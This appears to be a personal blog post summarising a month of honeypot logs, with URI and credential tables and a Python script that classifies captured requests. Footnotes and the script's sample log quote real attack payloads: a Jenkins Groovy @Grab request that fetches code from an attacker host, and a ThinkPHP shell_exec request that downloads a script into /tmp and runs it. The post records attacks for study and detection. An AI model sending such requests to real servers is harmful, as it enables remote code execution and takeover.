Nick Security Log

Honeypots, bug bounties, CTFs and other security-related things, written up as notes to myself.

[Honeypot] May 2019 BW-pot observation summary


Overall

It was a dull month overall.



I basically only look at new accesses and attack accesses, and while having no attack accesses is one thing, there were almost no new accesses either.


I'm writing this summary in June, and after I changed the IP address, accesses went up.


I assume they're just finding new IP addresses by some means and scanning them with tools, but since a larger sample seems better, I'm going to try changing the IP address every two to three months.

Top screen

(screenshot: BW-pot top screen)


One-month line graph

(screenshot: one-month line graph of accesses)


GET requests (top 100)

No.  URI  Count   (*1 to *4 are long URIs, written out in full below the table)
1 / 1647
2 /manager/html 750
3 /pma/ 51
4 *1 38
5 /TP/public/index.php 23
6 /index.action 21
7 *2 21
8 /robots.txt 17
9 /w00tw00t.at.blackhats.romanian.anti-sec:) 17
10 /pma/scripts/setup.php 16
11 /phpMyAdmin/scripts/setup.php 16
12 /phpmyadmin/scripts/setup.php 15
13 /.well-known/security.txt 13
14 /favicon.ico 13
15 /sitemap.xml 13
16 /api/.env 12
17 /.env 11
18 /echo.php 11
19 /proxy_ip_is_here 11
20 /myadmin/scripts/setup.php 10
21 /wp-login.php 9
22 /MyAdmin/scripts/setup.php 9
23 /manager/html/ 8
24 /phpmy/scripts/setup.php 8
25 //vtigercrm/vtigerservice.php 8
26 /admin-scripts.asp 7
27 *3 7
28 /english/ 6
29 /wp-json/wp/v2/users/ 5
30 *4 5
31 ///?author=1 5
32 ///wp-json/wp/v2/users/ 5
33 //about.php 4
34 /mysql/scripts/setup.php 4
35 /HNAP1/ 4
36 //blog/ 4
37 /console/login/LoginForm.jsp 4
38 /latest/meta-data/ 4
39 //admin/config.php 4
40 /mysqladmin/scripts/setup.php 4
41 //recordings/ 4
42 //a2billing/customer/templates/default/footer.tpl 4
43 /pHpMyAdMiN/scripts/setup.php 4
44 /scripts/setup.php 3
45 /latest/meta-data 3
46 /websql/scripts/setup.php 3
47 /Login/ 3
48 /db/scripts/setup.php 3
49 /recordings/ 3
50 /a2billing/admin/Public/PP_error.php 3
51 /testget?q=23333&port=80 3
52 /jmx-console/ 3
53 /tftpboot/ 3
54 /moo 3
55 /admin/scripts/setup.php 3
56 /phpMyAdmin/setup.php 2
57 /wordpress6/wp-login.php 2
58 /wordpress/wp-login.php 2
59 /wp7/wp-login.php 2
60 /wp4/wp-login.php 2
61 /wp5/wp-login.php 2
62 /wordpress1/wp-login.php 2
63 /wordpress5/wp-login.php 2
64 /device.rsp?opt=user&cmd=list 2
65 /wp6/wp-login.php 2
66 /wp3/wp-login.php 2
67 /wp2/wp-login.php 2
68 /wp1/wp-login.php 2
69 /wp/wp-login.php 2
70 /phpmyadmin/setup.php 2
71 /wordpress3/wp-login.php 2
72 /acadmin.php 2
73 /wordpress2/wp-login.php 2
74 /proxyjudge.php 2
75 /judge.php 2
76 /MySQL/scripts/setup.php 2
77 /admin.php 2
78 /phpMyAdmin2/scripts/setup.php 2
79 /.git/config 2
80 /PMA/scripts/setup.php 2
81 /dbadmin/scripts/setup.php 2
82 /index.php 2
83 /phpmyadmin/index.php?lang=en&pma_username=nginx&pma_password=nginx 2
84 /wp8/wp-login.php 2
85 /phpmy-admin/scripts/setup.php 2
86 /Lists/admin.php 2
87 /nx8j78af1b.jsp 2
88 /esps/admin/main.jspx 2
89 /downloader/ 2
90 /php-my-admin/scripts/setup.php 2
91 /phpMyAdmin-2.8.0.4/scripts/setup.php 2
92 /mysql/admin/index.php?lang=en 2
93 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2011 1
94 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweasdzxc 1
95 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=database 1
96 /phpMyAdmin-2/scripts/setup.php 1
97 /phpmyadmin2/scripts/setup.php 1
98 /PMA2005/scripts/setup.php 1
99 /phpMyAdmin-2.11.11.3/scripts/setup.php 1
100 /php-myadmin/scripts/setup.php 1

*1

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD;

Decoded, the value parameter is a four-line Groovy snippet: @GrabConfig(disableChecksums=true), @GrabResolver(name='NsGdMJsD', root='http[:]//185.162.235.211'), @Grab(group='package', module='NsGdMJsD', version='1'), import NsGdMJsD;. It targets the Jenkins script-compile check endpoint and is built so that "resolving the dependency" makes the server fetch from the attacker's host. (URL defanged as in the original.)

*2

/TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

A ThinkPHP invokefunction request that routes through call_user_func_array to call phpinfo(1). The harmless function makes this a probe: it only checks whether the call goes through.

*3

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27nuAObHkS%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27nuAObHkS%27,%20version=%271%27)%0aimport%20nuAObHkS;

The same request as *1 from the same host; only the random module name (nuAObHkS instead of NsGdMJsD) differs.

*4

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http[:]//81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;

The same ThinkPHP path as *2, but with shell_exec. Decoded, vars[1][] is wget http[:]//81.6.42.123/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; so a successful call downloads a script to /tmp/a and runs it.
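To show what the footnoted URIs look like once decoded, and how hits of the kinds in the table can be picked out of an access log, here is an added Python example. It is my own code, not BW-pot's. The log lines are constructed to mirror entries from the table, with RFC 5737 documentation addresses standing in for the real hosts, and the rule labels, the query splitter and the function names are my own assumptions, not anything the honeypot ships.

```python
"""Classify honeypot GET requests of the kinds listed in the table above.

Added example, not BW-pot code. SAMPLE_LOG is constructed to mirror URIs
from the table (documentation addresses replace the real hosts); the
labels in RULES and the helpers are assumptions made for this example.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: "<client ip> <method> <raw request URI>" per line.
SAMPLE_LOG = r"""
203.0.113.10 GET /
203.0.113.11 GET /pma/scripts/setup.php
203.0.113.12 GET /phpMyAdmin-2.11.11.3/scripts/setup.php
203.0.113.13 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
203.0.113.14 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://192.0.2.5/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;
203.0.113.15 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27x%27,%20root=%27http://192.0.2.6%27)%0a@Grab(group=%27package%27,%20module=%27x%27,%20version=%271%27)%0aimport%20x;
203.0.113.16 GET /api/.env
203.0.113.17 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
""".strip()

# (label, which decoded part to match, pattern). Labels are this example's own.
RULES = [
    ("jenkins-checkScriptCompile", "path",  re.compile(r"/checkScriptCompile$")),
    ("thinkphp-invokefunction",    "query", re.compile(r"\\think\\app/invokefunction")),
    ("phpmyadmin-setup-probe",     "path",  re.compile(r"/setup\.php$", re.I)),
    ("dotenv-probe",               "path",  re.compile(r"/\.env$")),
    ("zmeu-scanner-marker",        "path",  re.compile(r"^/w00tw00t\.at\.")),
]
GRAB_ROOT = re.compile(r"root='([^']*)'")


def query_params(raw_query):
    """Split a still-encoded query on '&' only, then percent-decode each side.

    Decoding after splitting matters: the shell_exec payload contains ';'
    and spaces, which some parse_qs versions treat as separators.
    """
    params = {}
    for pair in raw_query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(raw_uri):
    """Return (label, detail) for one raw request URI.

    detail is the decoded payload for the two RCE families (function and
    arguments for ThinkPHP, the @GrabResolver root for Jenkins), else ''.
    """
    raw_path, _, raw_query = raw_uri.partition("?")
    path = unquote(raw_path)
    query = unquote(raw_query)
    params = query_params(raw_query)
    for label, part, pattern in RULES:
        if not pattern.search(path if part == "path" else query):
            continue
        if label == "thinkphp-invokefunction":
            func = params.get("vars[0]", [""])[0]
            args = params.get("vars[1][]", [])
            return label, f"{func}({', '.join(args)})"
        if label == "jenkins-checkScriptCompile":
            m = GRAB_ROOT.search(params.get("value", [""])[0])
            return label, m.group(1) if m else ""
        return label, ""
    return "other", ""


def analyze(log_text):
    """Classify every line; return per-label counts and the flagged hits."""
    counts = Counter()
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        ip, _method, raw_uri = fields
        label, detail = classify(raw_uri)
        counts[label] += 1
        if label != "other":
            hits.append((ip, label, detail))
    return {"counts": counts, "hits": hits}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for label, n in result["counts"].most_common():
        print(f"{n:3d}  {label}")
    for ip, label, detail in result["hits"]:
        print(f"{ip:15s} {label:28s} {detail}")
```

The point of splitting the query before decoding is visible in the shell_exec line: once decoded, the command contains `;` and spaces, and a parser that splits on `;` would cut the payload in half. The Jenkins rule only pulls out the @GrabResolver root, which is the one field worth alerting on, since that is where the server would be made to connect.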


POST requests

No.  URI  Count
1 /tmUnblock.cgi 41
2 /TP/public/index.php?s=captcha 21
3 /users?page=&size=5 13
4 /sdk 3
5 /tmUnblock.cgi 3
6 /wp-login.php 2
7 /tmUnblock.cgi 2
8 /GponForm/diag_Form?images/ 2
9 /pma/index.php 1
10 /pma/index.php 1
11 /pma/index.php 1
12 /pma/index.php 1
13 /zabbix/index.php 1
14 /wp-login.php 1
15 /wp-login.php 1
16 /pma/index.php 1
17 /pma/index.php 1
18 /pma/index.php 1
19 /pma/index.php 1
20 /pma/index.php 1
21 /pma/index.php 1
22 /pma/index.php 1
23 /pma/index.php 1
24 /pma/index.php 1
25 /pma/index.php 1
26 /pma/index.php 1
27 /wp-login.php 1
28 /pma/index.php 1
29 /pma/index.php 1
30 /pma/index.php 1
31 /pma/index.php 1
32 /pma/index.php 1
33 /pma/index.php 1
34 /pma/index.php 1
35 /wp-login.php 1
36 /pma/index.php 1
37 /pma/index.php 1
38 /pma/index.php 1
39 /pma/index.php 1
40 /pma/index.php 1
41 /pma/index.php 1
42 /pma/index.php 1
43 / 1
44 /pma/index.php 1
45 /pma/index.php 1
46 /azenv.php?auth=155913765309941&a=PC&i=873348332&p=8080 1
47 /pma/index.php 1
48 /pma/index.php 1
49 /pma/index.php 1


phpMyAdmin users

No.  User  Count
1 root 40
2 admin 11
3 websrvc 4
4 server 2
5 nginx 2
6 project 1
7 popa3d 1


phpMyAdmin passwords

No.  Password  Count
1 123456*a 8
2 root 5
3 password 5
4 secret 4
5 1234 4
6 12345 3
7 123456 2
8 admin 2
9 Million0999$ 2
10 nginx 2
11 mysql 2
12 2016 1
13 2015 1
14 popa3d 1
15 secure 1
16 whatever 1
17 project 1
18 music 1
19 abc123 1
20 321 1
21 users 1
22 54321 1
23 database 1
24 password2018 1
25 123qweasd 1
26 host 1
27 123qwe 1
28 123qweasdzxc 1
29 password1 1
30 files 1
31 2011 1
32 2017 1
33 qazwsx 1


WordPress users

No.  User  Count
1 admin 3
2 (empty) 2
3 admin1 1


WordPress passwords

No.  Password  Count
1 admin 2
2 null 2
3 admin1 1
4 admin123 1


Tomcat users

No.  User  Count
1 admin 120
2 tomcat 119
3 manager 116
4 both 82
5 adminScript 82
6 user 82
7 administrator 82
8 (empty) 39
9 root 34
10 password 1


Tomcat passwords

No.  Password  Count
1 (empty) 59
2 admin 21
3 tomcat 21
4 manager 20
5 password 20
6 12345 18
7 s3cret 18
8 654321 18
9 123456 18
10 admin123 18
11 1234 18
12 123 18
13 111111 18
14 1qaz2wsx 18
15 letmein 14
16 1234567 14
17 12345678 14
18 master 14
19 monkey 14
20 888888 14
21 tomcat123 14
22 gts@05 14
23 welcome 14
24 qwerty 14
25 dragon 14
26 login 14
27 admin123!@# 14
28 football 14
29 baseball 14
30 666666 14
31 88888888 14
32 admin888 14
33 starwars 14
34 qwertyuiop 14
35 abc123 14
36 1234567890 14
37 123456789 14
38 princess 14
39 passw0rd 14
40 solo 14
41 root 6
42 rootroot 4
43 Passw0rd 4
44 root123 4
45 secret 4
46 123qwe 4
47 1111 4
48 toor 4
49 8888 4
50 4444 4
51 1 4
52 tomcattomcat 4
53 1qazxsw2 4
54 nimda 4
55 111 4
56 pass 4
57 321 4
58 0 4
59 Admin 4
60 1q2w3e4r 4
61 administrator 2
62 adminScript 2
63 both 2
64 user 2

